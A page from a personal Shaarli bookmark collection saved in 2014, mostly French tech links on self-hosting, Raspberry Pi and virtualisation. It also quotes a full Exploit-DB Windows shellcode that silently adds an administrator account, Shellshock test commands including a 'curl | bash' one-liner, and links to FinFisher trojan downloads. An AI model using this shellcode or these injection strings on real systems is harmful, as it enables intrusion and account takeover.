Links32
Tag cloud
Picture wall
Daily
RSS Feed
  • RSS Feed
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filters

Links per page

  • 20 links
  • 50 links
  • 100 links

Filters

Untagged links
page 58 / 80
Dayz server list status http://dayz-servers.org/stats/
Mon Oct 13 23:10:52 2014 archive.org

Welcome on the DayZ server list. Find all the best multiplayer servers for DayZ.
DayZ is a gritty, authentic, open-world survival horror hybrid-MMO game, in which players follow a single goal: to survive in the harsh post-apocalyptic landscape as long as they can. Players can experience powerful events and emotions arising from the ever-evolving emergent gameplay.

dayz server list status
musicForProgramming(); http://musicforprogramming.net/
Fri Oct 10 13:41:13 2014 archive.org
musicForProgramming(); music Programming Video
Retour à Caldav + Carddav avec Yunohost http://maniatux.fr/index.php?article521/retour-a-caldav-carddav-avec-yunohost
Fri Oct 10 09:39:10 2014 archive.org

Retour à Caldav + Carddav avec Yunohost

  • Le Blog Maniatux

Retour à Caldav + Carddav avec Yunohost
Rédigé par Xavier - 09 octobre 2014 - 4 commentaires
Avoir un agenda et des contacts synchronisés avec un serveur, c'est quand même pratique. Prenez vos rendez-vous sur votre smartphone et retrouvez-les sur votre ordinateur la seconde d'après. Changez de smartphone et récupérez toutes vos données juste en rétablissant l'accès à votre cloud. Il existe des tas de solutions pour cela, la première qui me vient à l'esprit est Activesync, un connecteur permettant de relier un périphérique aux services Microsoft ou à un serveur Exchange d'entreprise. C'est ce que j'utilise actuellement, il m'arrive de noter des rendez-vous persos dans l'agenda pro (il y a une option pour les rendre invisible aux autres). Mais ce n'est pas parfaitement idéal, puisque j'ai un YunoHost tout neuf autant en profiter.

Carddav et Caldav ne sont pas nouveaux pour moi, j'avais déjà fait quelques tentatives de synchronisation avec Owncloud, mais la complexité de l'ensemble et le manque de fiabilité (j'ai perdu des tas de contacts) m'ont fait basculer par défaut chez Google puis sur le serveur Exchange de l'entreprise. Mais avec YunoHost j'ai pu installer Baikal très facilement, qui n'est rien d'autre qu'un serveur Carddav / Caldav. Je n'ai pas confiance en Owncloud, mais je suis prêt à donner une chance à Baikal.

Une fois Baikal installé, il est automatiquement relié à l'annuaire LDAP et va créer un calendrier et un carnet de contacts par défaut associé à votre compte. Une "tuile" Baikal apparait sur votre portail SSO :

Baikal dispose d'une interface d'administration accessible en cliquant sur la tuile et en rajoutant /admin dans l'URL. Elle est plus ou moins réussie à mon goût. Elle s'en tient au rôle de serveur : créez vos calendriers et carnets de contacts, mais vous ne pouvez pas voir ce qu'il y a dedans à moins de connecter un client tiers. Pas facile pour les tests de synchronisation.

Côté client j'utilise les outils suivants :

Thunderbird + Connecteur SOGO (permet d'ajouter le support Carddav au gestionnaire de carnets d'adresses) + Lightning (ajoute un calendrier qui supporte Caldav) pour le desktop
AgentDav pour le web (pour les agenda uniquement, est disponible en app YunoHost)
Android + Application CardDav-Sync + Application CalDav-Sync pour la partie mobile

YunoHost manque malheureusement de documentation. L'installation de Baikal se fait en quelques clics, en revanche l'URL des connecteurs Caldav et Carddav n'est mentionnée nulle part. J'ai du aller chercher dans le INSTALL.md du github de baikal. J'en ai profité pour rédiger une petite page de documentation et la soumettre à YunoHost pour publication sur leur site.

Connecteur Caldav (Thunderbird + Lightning) : https://domain.com/baikal/cal.php/calendars/username/default
Connecteur Carddav (Thunderbird + SOGO) : https://domain.com/baikal/card.php/addressbooks/username/default/
Pour le moment la synchronisation entre les différents périphériques se passe bien. Je laisse couler quelques jours avant de juger de la fiabilité de l'ensemble (consommation batterie, réussite de la synchronisation, résolution des conflits...).

Caldav Carddav Yunohost linux raspberry
Lycos Denies Breach | Future South Gazette http://www.futuresouth.us/wordpress/?p=11
Fri Oct 10 07:53:24 2014 archive.org
thumbnail
Lycos Denies Breach
Infographie-iphone-6.jpg (JPEG Image, 700 × 2324 pixels) http://worldissmall.fr//wp-content/uploads/2014/10/Infographie-iphone-6.jpg
Wed Oct 8 22:13:20 2014 archive.org
thumbnail
iphone infographie
Jailbreak http://iphoneaddict.fr/post/news-133671-jailbreak-malware-appbuyer-vole-comptes-apple-mots-passe#
Wed Oct 8 22:07:17 2014 archive.org
thumbnail

Le malware AppBuyer vole les comptes Apple et les mots de passe | iPhoneAddict.fr

Jailbreak AppBuyer malware IOs Iphone
exploits windows http://www.exploit-db.com/exploits/33836/
Wed Oct 8 13:12:04 2014 archive.org
thumbnail

Add Admin User Shellcode (194 bytes) - Any Windows Version

Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Release date: 21/06/2014
Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b)
Size: 194 byte (NULL free)
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n

char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"
"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"
"\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"
"\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"
"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"
"\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"
"\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"
"\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"
"\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"
"\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7";

int main(int argc, char *argv){int (f)();f = (int ()())shellcode;(int)(f)();}

exploits windows
fr-usb-keyboard-guard https://www.gdata.fr/fr-usb-keyboard-guard
Wed Oct 8 11:01:49 2014 archive.org
usb keyboard guard security hack
VirtualBox : P2V http://maniatux.fr/index.php?article439/virtualbox-p2v
Thu Oct 2 17:14:21 2014 archive.org

VirtualBox : P2V

Rédigé par Xavier - 20 décembre 2013 - 1 commentaire

Un P2V (Physical to Virtual) est une opération qui consiste à transférer le système d'exploitation d'un ordinateur physique vers une machine virtuelle. C'est très pratique lorsque le hardware est défaillant ou sous-dimensionné et que vous souhaitez redonner un peu de patate à un serveur ou un poste de travail. Dans mon cas il s'agit d'un poste sous Windows XP que je souhaite virtualiser afin de l'utiliser sur une autre machine plus récente équipée de Windows 7. Voici la procédure.

  • Le Blog Maniatux
VirtualBox P2V
En avant pour Yunohost - Le Blog Maniatux http://maniatux.fr/index.php?article519/en-avant-pour-yunohost
Wed Oct 1 22:04:08 2014 archive.org

Yunohost Raspberry image

Yunohost Raspberry
Matchstick http://korben.info/matchstick-la-cle-hdmi-de-mozilla.html
Wed Oct 1 17:20:17 2014 archive.org
thumbnail
  • La clé HDMI de Mozilla qui va ridiculiser Google et sa Chromecast - Korben
matchstick clé HDMI
Avea | elgato.com https://www.elgato.com/fr/smart/avea
Mon Sep 29 21:58:54 2014 archive.org
Yify Pop http://korben.info/yify-pop.html
Mon Sep 29 21:51:42 2014 archive.org
thumbnail
  • Un clone de Popcorn Time à installer sur votre serveur - Korben
clone Popcorn Time
shellshocker https://shellshocker.net/
Mon Sep 29 11:36:14 2014 archive.org
thumbnail

shellshocker
What is #shellshock?

Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in since Tue Sep 30 2014: 1:32PM EST (See patch history), you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.

You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack.

You can test if a system is vulnerable by using the form below. Just provide a http or https url and test away!
Url

Please test responsibly. All tests details are logged. Do not test against websites that you do not have permission to test against. All data is archived in case of abuse.

Here is an example script that is vulnerable. Place this in your /cgi-bin/shockme.cgi and try hitting it with the shock tester.

!/bin/bash

echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"

Last updated Friday September 26th at 4:43PM EST: This website tester will now wait for a valid response before returning the state of the vulnerability. If the server responds with a 500 we assume you're vulnerable and we display the response immediately without waiting. If we get any other response code we will wait 3 seconds for a reply from your server and display if you're vulnerable or not.
Testing Your System

To test your system, you can simply run this one liner below to find if you're vulnerable.

curl https://shellshocker.net/shellshock_test.sh | bash

You can view the source of shellshock_test.sh on GitHub.

If you want to test each exploit individually without running the script above, feel free! They are listed below.
Exploit 1 (CVE-2014-6271)

There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)

Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.

env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo

If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)

Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.

env X=' () { }; echo hello' bash -c 'date'

If the above command outputs "hello", you are vulnerable.
Exploit 4 (CVE-2014-7186)

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"

A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
Exploit 5 (CVE-2014-7187)

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"

A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Exploit 6 (CVE-2014-6278)

shellshocker='() { echo You are vulnerable; }' bash -c shellshocker

You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"
Exploit 7 (CVE-2014-6277)

bash -c "f() { x() { ;}; x() { ;} <<a; }" 2>/dev/null || echo vulnerable

If the command outputs "vulnerable", you are vulnerable.

If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/release for your OS.

shellshocker unix linix vulnerability hack security Bash
GNU bash Environment Variable Command Injection (MSF) http://www.exploit-db.com/exploits/34777/
Thu Sep 25 18:17:27 2014 archive.org
thumbnail

GNU bash Environment Variable Command Injection (MSF)

GNU bash Environment Variable Command Injection
Raspberry PI http://www.kubii.fr
Wed Sep 24 11:30:42 2014 archive.org

Model B,
Raspberry PI 256 Mo
Raspberry Pi - Camera - Kubii.fr - Kubiweb SAS

Raspberry Pi
Downloads | Raspberry Pi http://www.raspberrypi.org/downloads/
Wed Sep 24 11:15:09 2014 archive.org
Raspberry Pi Help Download Software ISO
360° Aerial Panoramas - Geneva, Switzerland http://aerial.globalvision.ch/#p=scene_gare-de-cornavin
Mon Sep 22 12:16:43 2014 archive.org
Webcam Geneva drone
FinFisher en téléchargement chez Wikileaks - Korben http://korben.info/telecharger-finfisher.html
Mon Sep 15 16:55:15 2014 archive.org
thumbnail

Si vous aimez analyser les chevaux de Troie, en voici un qui va vous plaire. Il s'agit de l'outil allemand FinFisher (version pour Windows), le cheval de Troie utilisé par les services de renseignement du monde entier ainsi que FinFisher Relay et FinSpy Proxy qui sont des composants de la suite FinFisher. Ces derniers permettent de collecter des données sur les ordinateurs et mobiles infectés et de les transmettre aux espions tout en protégeant leur identité (leur IP en fait). C'est un peu comme un réseau de noeuds Tor, sauf que ça relaie uniquement de la data FinFisher. Ensuite tout ça est aggloméré et consulté via le FinSpy Master.

finspy FinFisher en téléchargement chez Wikileaks

Ce que permet FinFisher, c'est d'espionner des outils de messagerie en ligne, de VoIP (Skype), les échanges d'emails, le surf, mais aussi tout ce qui est consultation de sites (forums, blogs...etc), les fichiers en local sur l'ordinateur (disques durs, fichiers supprimés, conteneurs chiffrés...etc), de suivre en temps réel les données de géolocalisation de l'appareil et cerise sur le gâteau, il est même possible d’accéder aux périphériques tels que le microphone ou la webcam pour espionner ce qui se passe autour de la machine.

C'est moche, mais diablement efficace !

Évidemment, c'est Wikileaks qui l'offre au monde via son site ! Attention, il s'agit VRAIMENT d'un trojan. Je vous recommande donc de faire attention à ce que vous en faites. Plus que l'outil d'ailleurs, ce qui est vraiment intéressant, ce sont tous les documents fournis aussi par Wikileaks (Spyfiles 1, 2, 3 et 4) qui donnent des détails sur le fonctionnement et les possibilités de celui-ci. Ceux que je préfère, ce sont les rapports Excel de scan Antivirus... Il est affolant de voir que FinFisher n'est détecté par quasiment aucun AV. Seuls Panda et Eset semblent le repérer et encore, ça dépend des méthodes d'infection.

FinFisher Wikileaks
Installation de Shinken http://blogduyax.madyanne.fr/installation-de-shinken.html
Mon Sep 15 14:40:13 2014 archive.org

Fork de Nagios

Installation Shinken Naghios Supervision
page 58 / 80
1598 links, including 7 private
Shaarli - The personal, minimalist, super-fast, database free, bookmarking service by the Shaarli community - Theme by kalvn